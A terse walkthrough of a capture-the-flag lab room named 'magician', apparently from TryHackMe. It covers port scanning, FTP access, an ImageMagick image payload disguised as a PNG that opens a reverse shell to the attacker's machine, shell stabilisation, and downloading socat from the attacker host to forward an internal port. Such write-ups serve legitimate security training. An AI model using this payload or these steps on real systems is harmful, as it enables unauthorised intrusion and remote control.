magician

Room Link: https://tryhackme.com/room/magician

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP

After trying to login with anonymous it delays but after some time it finally logs in with the below message. The link below gives us some hints on what to do next.

Kali

ftp $VICTIM

Initial Shell

Kali

nc -lvnp 1337

revshell.txt

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/$KALI/1337 0<&1 2>&1'
pop graphic-context
pop graphic-context

Kali

cp revshell.txt revshell.png

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Port Forwarding & Finding Flag

Victim

cat the_magic_continues

Victim

ss -ltp
curl localhost:6666 

Kali

wget https://github.com/aledbf/socat-static-binary/releases/download/v0.0.1/socat-linux-amd64
python2 -m SimpleHTTPServer 81

Victim

cd /tmp
wget http://$KALI:81/socat-linux-amd64
chmod +x socat-linux-amd64 
./socat-linux-amd64  tcp-listen:7777,reuseaddr,fork tcp:localhost:6666